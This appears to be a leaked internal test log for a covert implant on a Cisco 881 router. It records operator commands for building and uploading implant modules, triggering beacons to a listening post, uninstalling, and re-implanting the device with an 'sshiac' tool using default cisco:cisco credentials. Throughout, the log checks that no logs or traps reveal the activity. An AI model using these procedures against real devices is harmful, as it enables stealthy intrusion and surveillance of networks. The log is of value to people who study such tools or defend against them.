        • Log file is appended on Blot-Proxy-CentOS 5.6
          • [root@blot blot]# pwd
            /var/log/blot
            [root@blot blot]# ls -phal
            total 148K
            drwxr-xr-x 2 beastbox blot 4.0K Mar 2 06:10 ./
            drwxr-xr-x 17 root root 4.0K Jun 16 04:02 ../
            -rw-r--r-- 1 beastbox blot 131K Jun 16 09:14 beastbox.log.enc

  3. Smoke Test - Install/Uninstall Modules
    • Create module and copy to Spicerack VM
      • root@cinnabuild-5:/home/cmn-build/cmn-5.0/implant/modules# make clean redir-powerpc

      • [root@blot-spicerack cmds]# scp -r root@10.9.8.108:/home/cmn-build/cmn-5.0/implant/modules/redir/powerpc/redir-powerpc.module .

    • Create upload cmd file
      • /opt/pepper/cmds
      • [root@blot-spicerack cmds]# vi redir-powerpc.cmd
        module_upload|redir-powerpc.module

      • [root@blot-spicerack cmds]# .././pepper redir-powerpc.cmd

      • [root@blot-spicerack cmds]# cp redir-powerpc.send /opt/spicerack/data/fb583dbf/Beacon/send/.

      • user1@Cinnamon-ICON:/opt/bacon$ sudo ./bacon XXX.XX.XXX.XXX (CABLEVISION[US]) 881.cfg www.suptest.com 443
        Sent packet to XXX.XX.XXX.XXX (CABLEVISION[US]):44719

        • [root@blot-spicerack receive]# more 20150616170301_0000000013.status

          [Command Results]
          Total commands reporting status: 1

          Command: 1
          Module: 4
          Command: 0
          Status: SUCCESS

          [root@blot-spicerack receive]# more 20150616171309_0000000001.rcvd

          [Session Info]
          Rcvd Start Time = 06/16/2015 17:13:09.854
          Session = 1
          Request Type = HTTPS
          Module = Beacon

          [Connection Info]
          Proxy IP = 172.20.13.10:443
          Source IP = XXX.XX.XXX.XXX (CABLEVISION[US]):27816
          Destination IP = 172.20.13.11:4097

          [Implant Info]
          Unique Implant ID = 0xfb583dbf
          Tool ID = 0x9219d10c
          Up Time = 19854
          Impersonated IP = XXX.XXX.XXX.XX (CORE2[US])

          [Versioning]
          Cinnamon Version = 5.0.0 Jun 16 2015 - 07:17:00
          IOS Version = C880 Software (C880DATA-UNIVERSALK9-M), Version 15.1(2)T4, RELEASE SOFTWARE (fc1)
          Build ID = 1856:7b366e5a9b31

          [Beacon Health]
          Max Consecutive Timed Beacon Failures = 10
          Failed Beacon Counter = 6
          Beacon Failsafe Status = Not Tripped

          [Memory Health]
          IOMEM Free Size = 0x00fbac58 Bytes

          [BreakPoints]
          Total Breakpoints = 6
          Address Label
          ---------- -----
          0x80495534 0x4
          0x80cced88 0x4
          0x80258478 0x4
          0x8111eca0 0x4
          0x802376dc 0x4
          0x8210cfbc 0x1

          [Modules]
          Active Modules: 5
          Module Version
          0 5.0.0
          1 5.0.0
          2 5.0.0
          3 5.0.0
          4 5.0.0

      • Upload Survey Module
        • Before survey module upload:

          881-Top#show mem
          Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
          Processor 84A91420 164031456 42485408 121546048 114024412 109062604
          I/O E700000 26214400 9549340 16665060 16487744 16493660

        • Created survey module on BuildVM - make clean survey-powerpc

        • Copied survey module to Blot Spicerack - scp survey-powerpc root@172.20.13.11:/opt/pepper/cmds/.
        • Created survey_upload.cmd - module_upload|survey-powerpc.module
        • Peppered survey_upload.cmd - .././pepper survey_upload.cmd
        • Copied .send file to send directory and triggered implant
        • Module uploaded successfully:

          [root@blot-spicerack receive]# more 20150616182438_0000000002.status

          [Command Results]
          Total commands reporting status: 1

          Command: 1
          Module: 4
          Command: 0
          Status: SUCCESS

        • Memory after module upload:

          881-Top#show mem
          Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
          Processor 84A91420 164031456 42485460 121545996 114024412 109062604
          I/O E700000 26214400 9549340 16665060 16487744 16493660

        • Did not observe any log messages
  4. Smoke Test - Uninstall CMN
    1. Created command file to uninstall - 

      device_uninstall|0

    2. Peppered command and copied to send directory, triggered CMN
    3. Impant picked up file - saw no spike in CPU, but instead a drop from about 11% five second value to 5%.
    4. memory after uninstall

      881-Top#show mem
      Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
      Processor 84A91420 164031456 42497720 121533736 114024412 109062604
      I/O E700000 26214400 9549340 16665060 16487744 16493660

  5. Ad hoc Test - Reinstall after install/uninstall
    1. After test 4, attempted to install base CMNCaiman (Codename)? again via remote - upload successful
    2. Memory after uninstall

      881-Top#show mem
      Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
      Processor 84A91420 164031456 42497720 121533736 114024412 109062604
      I/O E700000 26214400 9549340 16665060 16487744 16493660

    3. Performed 3 base install/uninstalls with device_uninstall|0 command and 3 more base uninstalls with device_uninstall|1

    4. No crash, no cpu spikes, no syslog messages to buffer or console.
    5. Memory after install/uninstalls - Used memory about 12kb lower and no change to largest free block :

      881-Top#show mem
      Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
      Processor 84A91420 164031456 42485788 121545668 114024412 109062604
      I/O E700000 26214400 9549340 16665060 16487744 16493660

  6. Ad hoc Test - Install CMNCaiman (Codename)? base and then both modules with one command file
    1. Reloaded device to start with clean DUT
    2. Attacked with SSHIAC and uploaded CMNCaiman (Codename)? base
    3. created a command file with both redir and survey module upload commands
      module_upload|survey-powerpc.module
      module_upload|redir-powerpc.module
    4. When pepper was run on this file, command file validation failed error - expecting 1 line
    5. When I tried to put both files on 1 line, got a command file validation error - expecting 1 argument
    6. Created two separate .send files to upload the modules and copied both into send directory, triggered implant
  7. Ad hoc Test - Attempt to install modules when they are already installed
    1. Got the following status file

      [root@blot-spicerack receive]# more 20150616210905_0000000019.status

      [Command Results]
      Total commands reporting status: 4

      Command: 1
      Module: 4
      Command: 0
      Status: FAILURE - 0x00000004

      Command: 2
      Module: 4
      Command: 0
      Status: SUCCESS

      Command: 3
      Module: 4
      Command: 0
      Status: FAILURE - 0x00000004

      Command: 4
      Module: 4
      Command: 0
      Status: SUCCESS

      [root@blot-spicerack receive]#

    2. No logs reported on console or syslog

  8. Ad hoc Test - Simulate power failure, subsequent beacon attempt, and re-attack
    • Memory prior to start of test:
      • Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
        Processor 84A91420 164031456 42310372 121721084 116302072 111284268
        I/O E700000 26214400 9549340 16665060 16525184 16531100

    • Pull power from 881 while running with CMNCaiman (Codename)? and modules previously installed and running successfully
      • No suspicious console/buffer logs on reboot other than what would show up after a reboot after power failure
      • Memory post boot-up:
        • Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)
          Processor 84A91420 164031456 41706948 122324508 116079892 111069152
          I/O E700000 26214400 9683944 16530456 16527360 16527324

    • Attempt to send bacon simulating operator that is not aware that the target device had lost power
      • Sent multiple ./bacon beacon requests without response on Spicerack LP.
      • No addtional console/buffer logs or snmp traps show from target device
    • Re-attack with ssh-iac and re-implant 881 target device:
      • root@Cinnamon-ICON:/home/user1/IAC 4.1.0/delivery/IAC-4.1.0/bin# ./sshiac-ppc -i XXX.XX.XXX.XXX (CABLEVISION[US]) -l cisco:cisco

        • Received: LGDHM
        • #source aliases = remote>
        • #broad
        • #./seq set 1
        • #broad = status OK
        • [target:XXX.XX.XXX.XXX (CABLEVISION[US])] remote> ./bin/ramUploadAndExecuteCmn800.py /home/user1/880-norb/cmn-880-norb.bin

        • "yes"
        • file chunks uploaded and reach 100%
        • Wait 3 minutes minimum
        • Sent beacon from ICON to DUTDevice Under Test -> successfully received reply on Spicerack LP
          • No console/bugger logs or snmp traps received

 

 

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh